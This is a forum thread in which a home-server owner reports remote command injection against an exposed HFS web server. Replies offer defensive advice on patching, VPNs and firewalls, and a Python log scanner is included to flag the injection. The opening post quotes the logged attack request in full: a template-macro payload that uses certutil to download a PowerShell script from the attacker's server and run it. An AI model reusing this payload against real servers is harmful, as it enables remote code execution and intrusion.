Attack on my Home Server

arup

Disciple
I've been running a home server (OS: Win11 23H2) that I use as a Tally licence server as well as for some storage. It has a static IP.
Nothing was encrypted till now and anyone can access it if they know the IP (I don't tell anyone the IP).
Today when I logged into it, there was a long list of Windows Defender blocked threats.
I checked for the source and found that it came in through port 80, which is open in HFS.
103.87.240.114:36368 Requested GET /?n=> &cmd=cmd /c certutil -url""""cache -split -f http://103.87.240.114:8084/download "logs1.ps1" && powershell -ExecutionPolicy Bypass -File "logs1.ps1"&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
I was unaware that a simple HTTP host can be triggered externally to execute commands.
The WHOIS of the malicious IP points to Hong Kong.
I've executed a full system scan through Windows Defender and didn't find any threats.
I've turned on the HTTP server again, and again I'm facing incoming traffic from that IP address.
I've banned the IP address, but the attacker might use another IP for the same as well.

Is there any option for blocking cmd lines from execution if they are pushed by browser requests like this to an HTTP server?
I've banned the IP address, but the attacker might use another IP for the same as well.
It's indeed true. Now I'm getting malicious traffic from
125.229.247.222
95.214.55.138
Right now, I've turned off the HTTP server completely until I find a solution.
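The request quoted above works by smuggling HFS template macros (the `{.name|arg.}` syntax, with `exec` being the one that runs a command) into the search parameter. As an added example (not from the original post or from HFS), the script below scans request lines in the same "ip:port Requested GET /path" shape as the log above, URL-decodes them, and flags any that carry template macros, so that the source IPs can be fed to a firewall block list; the sample log lines are constructed and contain only harmless commands.

```python
import re
from urllib.parse import unquote

# Constructed sample log, shaped like the HFS entries quoted in the post.
# Lines 1 and 4 mimic the macro-injection request; lines 2 and 3 are benign.
SAMPLE_LOG = """\
103.87.240.114:36368 Requested GET /?n=%3E&cmd=cmd%20/c%20whoami&search=%7B.exec%7C%7B.%3Fcmd.%7D%7Cout%3Dabc.%7D%7B.%5Eabc.%7D
192.168.1.20:51234 Requested GET /files/report.pdf
192.168.1.21:51300 Requested GET /?search=quarterly%20sales
95.214.55.138:40001 Requested GET /?search=%7B.exec|cmd%20/c%20echo%20hi.%7D
"""

LINE_RE = re.compile(r"^(?P<ip>[\d.]+):(?P<port>\d+) Requested (?P<method>[A-Z]+) (?P<path>\S+)")
# HFS template macros look like {.name|arg|arg.}; a client has no legitimate reason to send them.
MACRO_RE = re.compile(r"\{\.\s*([A-Za-z^?]+)")
EXEC_MACROS = {"exec"}  # the macro that runs an OS command


def url_decode_fully(s, rounds=3):
    """Decode repeatedly so double-encoded payloads don't slip past the check."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def inspect_line(line):
    """Return a finding for a request line carrying template macros, or None if it looks benign."""
    m = LINE_RE.match(line)
    if not m:
        return None
    path = url_decode_fully(m.group("path"))
    macros = MACRO_RE.findall(path)
    if not macros:
        return None
    severity = "critical" if EXEC_MACROS & set(macros) else "suspicious"
    return {"ip": m.group("ip"), "macros": sorted(set(macros)), "severity": severity}


def scan_log(text):
    """Run inspect_line over every line of a log and collect the findings."""
    return [f for f in (inspect_line(line) for line in text.splitlines()) if f]


def ips_to_block(findings):
    """Source IPs that sent an exec macro, ready for a firewall deny rule."""
    return sorted({f["ip"] for f in findings if f["severity"] == "critical"})


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
    print("block:", ips_to_block(scan_log(SAMPLE_LOG)))
```

Flagging on the macro delimiters rather than on a specific command string catches variants that swap `certutil` for another downloader, and blocking on the address list covers the second and third IPs that showed up once the first was banned.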
 
I have a server in the cloud, and it is constantly being scanned and tested, most frequently by scripts looking for WordPress / PHP vulnerabilities. Whatever server you're using: keep it up to date. Make sure the update is automatic; don't wait for human input for it to be updated. That should suffice.

When your server got the malicious request, what did it do? Did it actually execute the payload? That would be a major flaw in the server software. You should find a different server if it is not yet patched (for example, you can set up nginx to reverse proxy requests to your server of choice, and you can set it up so that nginx only forwards URL patterns you recognize).

EDIT: As @bobbyprajan said above, if this is scary, remove the open port and switch to a VPN solution (like Tailscale, which is free for personal use).
 
A lot of folks seem to be suggesting that closing ports on the router is a solution..
However, unless you are on a local ISP, all your devices are anyway fully exposed to the Internet with fully addressable IPv6 public addresses.

Unfortunately the majority of consumer routers do not have any kind of firewall - which was OK with IPv4 due to the router NAT, so you got security as a side effect of NATing from a single public IP.
No longer true though.

Earlier, scans and attacks were prevalent only on IPv4, but IPv6 scans and attacks are getting increasingly common now.
 
When your server got the malicious request, what did it do? Did it actually execute the payload?
The server actually processes the request and tries to execute the malicious code through the command prompt (cmd). At the time of the attack, the server stops responding for a few seconds until the malicious code is eventually blocked by Windows Defender; thereafter the server acts normally till the next attack.
 
The server actually processes the request and tries to execute the malicious code through the command prompt (cmd). At the time of the attack, the server stops responding for a few seconds until the malicious code is eventually blocked by Windows Defender; thereafter the server acts normally till the next attack.
I think this is very serious. You should not be using / exposing a server that acts on external requests in this way.

EDIT: Clarifying
- if the request is anonymous, a server may respond to read-only requests for public data
- if the request is authenticated, only then can a server try to do other things, like executing code or mutating state
You should figure out how to restrict such calls to authenticated users only ASAP.
 
A lot of folks seem to be suggesting that closing ports on the router is a solution..
However, unless you are on a local ISP, all your devices are anyway fully exposed to the Internet with fully addressable IPv6 public addresses.

Unfortunately the majority of consumer routers do not have any kind of firewall - which was OK with IPv4 due to the router NAT, so you got security as a side effect of NATing from a single public IP.
No longer true though.

Earlier, scans and attacks were prevalent only on IPv4, but IPv6 scans and attacks are getting increasingly common now.
What's the solution then?
 
What's the solution then?
Ideally a firewall that can handle IPv6.

I have been on OPNsense as my primary router for a while now, so no impact due to the IPv6 transition.. so that is one option.

Because of the above, I haven't really explored whether any of the newer consumer routers come with a firewall - but that could be option two.
 
Nothing was encrypted till now and anyone can access it if they know the IP (I don't tell anyone the IP).

Ummm, isn't this the reason for being attacked? "anyone can access if they know the IP" - I mean, there are plenty of botnets continually scanning public IPs for known services/logins, and here you've left it "not encrypted", meaning I guess no login page or something like that?
 
Nothing was encrypted till now and anyone can access it if they know the IP

Wait, you had... a Windows machine exposed to the internet... DIRECTLY?! That should never be done. It's never safe. Exposing services through a static IP has never been a good idea, not even twenty years ago when everyone had their own private FTP server running on their desktop.

Set up Tailscale, or Wireguard. Use that and only that to connect two private networks across the internet. They're both free.
 